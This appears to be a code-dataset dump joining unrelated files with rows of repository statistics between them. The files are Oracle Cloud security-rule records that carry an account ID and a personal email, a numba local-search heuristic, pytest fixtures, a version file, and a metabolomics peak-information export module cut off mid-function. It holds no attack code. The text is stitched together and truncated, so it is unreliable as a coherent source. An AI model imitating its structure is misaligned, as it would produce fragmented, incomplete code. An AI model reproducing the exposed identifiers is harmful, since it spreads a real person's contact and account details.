'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbexpress',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dbexpress',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dbexpress'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [
'/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_trusted_hosts_dblistener'],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dblistener'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_ms',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_p2admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/sys_infra2wls_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/sys_infra2wls_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/sys_infra2otd_admin_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/sys_infra2otd_admin_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd_infraadmin',
'srcIpAddressPrefixSets': ['/oracle/public/paas-infra'], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_p2otd_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/JaaS/gc3oladdoam726/lb/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls2db_dbport',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls2db_dbport',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/dbport'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dblistener',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_p2_dblistener',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/ora_db',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/dbaas/gc3oladdoam725/db_1/dblistener'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ssh',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_p2otd_ssh',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'ingress', 'srcVnicSet': None,
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ssh'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_acl_default',
'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/APICS/gc3oladdoam728/1/lb/ora_otd_infraadmin',
'dstVnicSet': None, 'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ahttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_p2admin_ahttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ahttps'], 'enabledFlag': False},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_wls_infraadmin',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_chttps',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_p2otd_chttps',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': None, 'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/ora_otd',
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [],
'secProtocols': ['/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/lb/chttps'], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_admin', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_ingress_self',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_ingress_self',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'ingress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms',
'dstVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'srcIpAddressPrefixSets': [],
'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True},
{'name': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_egress_all',
'uri': 'https://compute.uscom-central-1.oraclecloud.com:443/network/v1/secrule/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms_egress_all',
'description': None, 'tags': [],
'acl': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_acl_default', 'flowDirection': 'egress',
'srcVnicSet': '/Compute-587626604/manjunath.udupa@oracle.com/paas/SOA/gc3oladdoam727/wls/ora_ms', 'dstVnicSet': None,
'srcIpAddressPrefixSets': [], 'dstIpAddressPrefixSets': [], 'secProtocols': [], 'enabledFlag': True}]
| 112.619403 | 208 | 0.680439 | 9,555 | 90,546 | 6.332496 | 0.013919 | 0.138827 | 0.160312 | 0.192374 | 0.993885 | 0.99329 | 0.992133 | 0.992133 | 0.991654 | 0.988249 | 0 | 0.100454 | 0.158284 | 90,546 | 803 | 209 | 112.759651 | 0.693455 | 0.002507 | 0 | 0.59383 | 0 | 0.455013 | 0.744795 | 0.448887 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.001285 | 0 | 0.001285 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
a326fd21fb3a2be3b3d8282f251db2fe55afa637 | 4,339 | py | Python | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | kmmi/heuristics/neighborhood_search.py | Decitizen/kMMI | 921ef6e45fbec484251444886e246741d7f0120a | [
"MIT"
] | null | null | null | from time import process_time
from datetime import timedelta as td
import numpy as np
from numba import *
from kmmi.heuristics.initialize import *
from kmmi.heuristics.utils import __update_degree_vecs
@njit
def ls_one_n_beam(Uo, Uo_w, A, A_beam, alpha, beta, tol=0.0,
find_maxima=False, one_in_k=False, verbose=False):
"""Computes local search in the 1-neighborhood of the Ho set such that
node is selected using beam criterion; the space of neighbors with heaviest
links in the 1-neighborhood of the current H nodes is searched first. First
improvement of the objective function is returned.
"""
k = Uo.sum()
n = A_beam.shape[1]
Up_w = Uo_w
f_prime = 0.0
xip = xjp = -1
u_idxs = np.where(Uo)[0]
if not one_in_k:
replace_ids = u_idxs.copy()
if not find_maxima:
np.random.shuffle(u_idxs)
L = 0
stop = False
for i in range(k):
if stop: break
v = u_idxs[i]
for j in range(n):
if stop: break
xj = A_beam[v,j]
if xj != -1 and not Uo[xj]:
if one_in_k:
replace_ids = np.random.choice(u_idxs, 1)
for xi in replace_ids:
L += 1
delta_f = alpha[xj] - alpha[xi] - A[xi,xj]
if delta_f > f_prime:
Up_w = Uo_w + delta_f
f_prime = delta_f
xip = xi
xjp = xj
if verbose:
print(':: Improvement found: +', (delta_f))
print(':: Objective function value: ', Up_w,', iters: ', L)
if not find_maxima:
stop = True
break
if Up_w == Uo_w:
if verbose: print(':: No improvement found during local search.')
return Uo, Uo_w, alpha, beta
assert xip >= 0 and xjp >= 0
alpha_p, beta_p = __update_degree_vecs(A, alpha, beta, xip, xjp)
Up = Uo.copy()
Up[xjp] = True
Up[xip] = False
return Up, Up_w, alpha_p, beta_p
@njit
def ls_one_n_beam_fs(Uo, Uo_fs, Uo_w, A, A_beam, alpha, beta, tol=0.0,
find_maxima=False, one_in_k=False, verbose=False):
"""Computes local search in the 1-neighborhood of the Ho set such that
node is selected using beam criterion; the space of neighbors with heaviest
links in the 1-neighborhood of the current H nodes is searched first. First
improvement of the objective function is returned.
"""
k1 = Uo.sum()
k2 = Uo_fs.sum()
n = A_beam.shape[1]
# Keep track of best improvement
Up_w = Uo_w
f_prime = 0.0
xip = xjp = -1
u_idxs = np.where(Uo)[0]
u_idxs_fs = np.where(Uo_fs)[0]
if not one_in_k:
replace_ids = u_idxs.copy()
if not find_maxima:
np.random.shuffle(u_idxs)
L = 0
stop = False
for i in range(k1+k2):
if stop: break
v = u_idxs[i] if i < k1 else u_idxs_fs[i-k1]
for j in range(n):
if stop: break
xj = A_beam[v,j]
if xj != -1 and not Uo[xj] and not Uo_fs[xj]:
if one_in_k:
replace_ids = np.random.choice(u_idxs, 1)
for xi in replace_ids:
L += 1
delta_f = alpha[xj] - alpha[xi] - A[xi,xj]
if delta_f > f_prime:
Up_w = Uo_w + delta_f
f_prime = delta_f
xip = xi
xjp = xj
if verbose:
print(':: Improvement found: +', (delta_f))
print(':: Objective function value: ', Up_w,', iters: ', L)
if not find_maxima:
stop = True
break
if Up_w == Uo_w:
if verbose: print(':: No improvement found during local search.')
return Uo, Uo_w, alpha, beta
assert xip >= 0 and xjp >= 0
alpha_p, beta_p = __update_degree_vecs(A, alpha, beta, xip, xjp)
Up = Uo.copy()
Up[xjp] = True
Up[xip] = False
return Up, Up_w, alpha_p, beta_p | 34.436508 | 87 | 0.5121 | 618 | 4,339 | 3.414239 | 0.184466 | 0.028436 | 0.017062 | 0.017062 | 0.872512 | 0.872512 | 0.84218 | 0.825118 | 0.825118 | 0.825118 | 0 | 0.014236 | 0.401014 | 4,339 | 126 | 88 | 34.436508 | 0.797614 | 0.133441 | 0 | 0.823529 | 0 | 0 | 0.056512 | 0 | 0 | 0 | 0 | 0 | 0.019608 | 1 | 0.019608 | false | 0 | 0.058824 | 0 | 0.117647 | 0.058824 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6e6100620cfaa90d3fa369e243ae848c5bd26be3 | 113 | py | Python | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 6,306 | 2018-02-04T11:14:11.000Z | 2022-03-31T13:36:53.000Z | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 982 | 2018-02-05T03:06:49.000Z | 2022-03-31T16:58:57.000Z | alphapose/version.py | SvipRepetitionCounting/AlphaPose | 0cc38e4c1d6f08ea9c34c720ae188506d3de6eb6 | [
"Apache-2.0"
] | 1,855 | 2018-02-04T11:27:12.000Z | 2022-03-31T17:25:53.000Z | # GENERATED VERSION FILE
# TIME: Tue Aug 18 16:28:27 2020
__version__ = '0.3.0+cbc364f'
short_version = '0.3.0'
| 18.833333 | 32 | 0.699115 | 21 | 113 | 3.52381 | 0.714286 | 0.216216 | 0.243243 | 0.27027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.221053 | 0.159292 | 113 | 5 | 33 | 22.6 | 0.557895 | 0.469027 | 0 | 0 | 1 | 0 | 0.315789 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
42c74d765b0525854badc5e05769457b1a3c3075 | 2,012 | py | Python | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 2 | 2021-07-20T17:03:38.000Z | 2021-07-20T17:06:25.000Z | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 7 | 2021-10-01T01:17:49.000Z | 2021-10-12T15:44:48.000Z | api/tests/unit/conftest.py | DiogenesPolanco/flagsmith | 55f80a17845c10acbfbc9e195c36801b322e18ac | [
"BSD-3-Clause"
] | 2 | 2021-11-16T12:27:37.000Z | 2021-12-22T06:55:39.000Z | import pytest
from projects.models import Project
from organisations.models import Organisation
from environments.models import Environment
from users.models import FFAdminUser
@pytest.fixture()
def organisation_one(db):
return Organisation.objects.create(name="Test organisation 1")
@pytest.fixture()
def organisation_two(db):
return Organisation.objects.create(name="Test organisation 2")
@pytest.fixture()
def organisation_one_project_one(organisation_one):
return Project.objects.create(name="Test Project 1", organisation=organisation_one)
@pytest.fixture()
def organisation_one_project_two(organisation_one):
return Project.objects.create(name="Test Project 2", organisation=organisation_one)
@pytest.fixture()
def organisation_two_project_one(organisation_two):
return Project.objects.create(name="Test Project 1", organisation=organisation_two)
@pytest.fixture()
def organisation_two_project_two(organisation_two):
return Project.objects.create(name="Test Project 2", organisation=organisation_two)
@pytest.fixture()
def organisation_one_project_one_environment_one(organisation_one_project_one):
return Environment.objects.create(
name="Test Environment 1", project=organisation_one_project_one
)
@pytest.fixture()
def organisation_one_project_one_environment_two(organisation_one_project_one):
return Environment.objects.create(
name="Test Environment 2", project=organisation_one_project_one
)
@pytest.fixture()
def organisation_two_project_one_environment_one(organisation_two_project_one):
return Environment.objects.create(
name="Test Environment 1", project=organisation_two_project_one
)
@pytest.fixture()
def organisation_two_project_one_environment_two(organisation_two_project_one):
return Environment.objects.create(
name="Test Environment 2", project=organisation_two_project_one
)
@pytest.fixture()
def user_one():
return FFAdminUser.objects.create(email="test@example.com")
| 28.742857 | 87 | 0.801193 | 247 | 2,012 | 6.255061 | 0.11336 | 0.090615 | 0.113916 | 0.18123 | 0.858252 | 0.810356 | 0.803884 | 0.728803 | 0.561812 | 0.494498 | 0 | 0.005593 | 0.111332 | 2,012 | 69 | 88 | 29.15942 | 0.858501 | 0 | 0 | 0.326087 | 0 | 0 | 0.090457 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.23913 | false | 0 | 0.108696 | 0.23913 | 0.586957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
6e4a27ad0c729c08d3a53b69c7c8abdaa40481b6 | 36,427 | py | Python | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | SBaaS_quantification/stage01_quantification_peakInformation_io.py | dmccloskey/SBaaS_quantification | b2a9c7a9a0d318f22ff20e311f94c213852ba914 | [
"MIT"
] | null | null | null | # System
import json,re
# SBaaS
from .stage01_quantification_peakInformation_query import stage01_quantification_peakInformation_query
from .stage01_quantification_MQResultsTable_query import stage01_quantification_MQResultsTable_query
# Resources
from io_utilities.base_importData import base_importData
from io_utilities.base_exportData import base_exportData
from matplotlib_utilities.matplot import matplot
from SBaaS_base.sbaas_template_io import sbaas_template_io
from ddt_python.ddt_container import ddt_container
class stage01_quantification_peakInformation_io(stage01_quantification_peakInformation_query,
stage01_quantification_MQResultsTable_query,
sbaas_template_io):
def export_scatterLinePlot_peakInformation_matplot(self,experiment_id_I,sample_names_I=[],
sample_types_I=['Standard'],
component_names_I=[],
peakInfo_I = ['retention_time'],
acquisition_date_and_time_I=[None,None],
x_title_I='Time [hrs]',y_title_I='Retention Time [min]',y_data_type_I='acquisition_date_and_time',
plot_type_I='single',
filename_O = 'tmp',
figure_format_O = 'png'):
'''Analyze retention-time, height, s/n, and assymetry'''
#INPUT:
# experiment_id_I
# sample_names_I
# sample_types_I
# component_names_I
# peakInfo_I
# acquisition_date_and_time_I = ['%m/%d/%Y %H:%M','%m/%d/%Y %H:%M']
# y_data_type_I = 'acquisition_date_and_time' or 'count'
# plot_type_I = 'single', 'multiple', or 'sub'
print('export_peakInformation...')
#TODO: remove after refactor
mplot = matplot();
#convert string date time to datetime
# e.g. time.strptime('4/15/2014 15:51','%m/%d/%Y %H:%M')
acquisition_date_and_time = [];
if acquisition_date_and_time_I and acquisition_date_and_time_I[0] and acquisition_date_and_time_I[1]:
for dateandtime in acquisition_date_and_time_I:
time_struct = strptime(dateandtime,'%m/%d/%Y %H:%M')
dt = datetime.fromtimestamp(mktime(time_struct))
acquisition_date_and_time.append(dt);
else: acquisition_date_and_time=[None,None]
data_O = [];
component_names_all = [];
# get sample names
if sample_names_I and sample_types_I and len(sample_types_I)==1:
sample_names = sample_names_I;
sample_types = [sample_types_I[0] for sn in sample_names];
else:
sample_names = [];
sample_types = [];
for st in sample_types_I:
sample_names_tmp = [];
sample_names_tmp = self.get_sampleNames_experimentIDAndSampleType(experiment_id_I,st);
sample_names.extend(sample_names_tmp);
sample_types_tmp = [];
sample_types_tmp = [st for sn in sample_names_tmp];
sample_types.extend(sample_types_tmp);
for sn in sample_names:
print('analyzing peakInformation for sample_name ' + sn);
# get sample description
desc = {};
desc = self.get_description_experimentIDAndSampleID_sampleDescription(experiment_id_I,sn);
# get component names
if component_names_I:
component_names = component_names_I;
else:
component_names = [];
component_names = self.get_componentsNames_experimentIDAndSampleName(experiment_id_I,sn);
component_names_all.extend(component_names);
for cn in component_names:
# get rt, height, s/n
sst_data = {};
sst_data = self.get_peakInfo_sampleNameAndComponentName(sn,cn,acquisition_date_and_time);
if sst_data:
